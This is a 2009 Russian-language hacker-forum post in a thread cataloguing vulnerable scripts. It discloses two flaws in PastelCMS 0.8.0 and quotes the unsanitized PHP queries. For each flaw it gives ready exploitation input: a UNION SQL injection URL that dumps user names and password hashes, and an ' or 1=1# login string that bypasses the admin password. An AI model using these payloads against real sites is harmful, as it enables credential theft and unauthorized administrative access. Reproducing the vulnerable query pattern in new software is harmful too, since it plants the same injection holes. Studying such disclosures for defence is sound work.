Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

PastelCMS 0.8.0
  #112  
Старый 21.04.2009, 14:02
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию PastelCMS 0.8.0
PastelCMS 0.8.0
Сайт: http://pastel.pri.ee/

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
index.php
PHP код:
. . .
$sql_up $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."menu_struct WHERE id='$_GET[id]'");
$menu_up $mysql->fetch_array($sql_up);
. . . 
Эксплуатация:
Цитата:
http://site.ru/?id=-1'+union+select+1,concat_ws(0x2F,user,pass),3,4,5, 6,7,8,9,10,11,12,13,14+from+users--+
Authorization bypass
При magic_quotes_gpc=off

Уязвимый код:
admin.php
PHP код:
if($_GET['log'] == 'in') {
    if($_POST['user'] != '' && $_POST['pass'] != '') {
        $sql $mysql->query("SELECT * FROM ".$conf['mysql_prefix']."users WHERE user='$_POST[user]' AND pass='".md5($_POST['pass'])."'");
        $count $mysql->num_rows($sql);
. . . 
Эксплуатация:
В поле Username: ' or 1=1#
В поле Password что угодно
Последний раз редактировалось ElteRUS; 21.04.2009 в 14:09..
 
Ответить с цитированием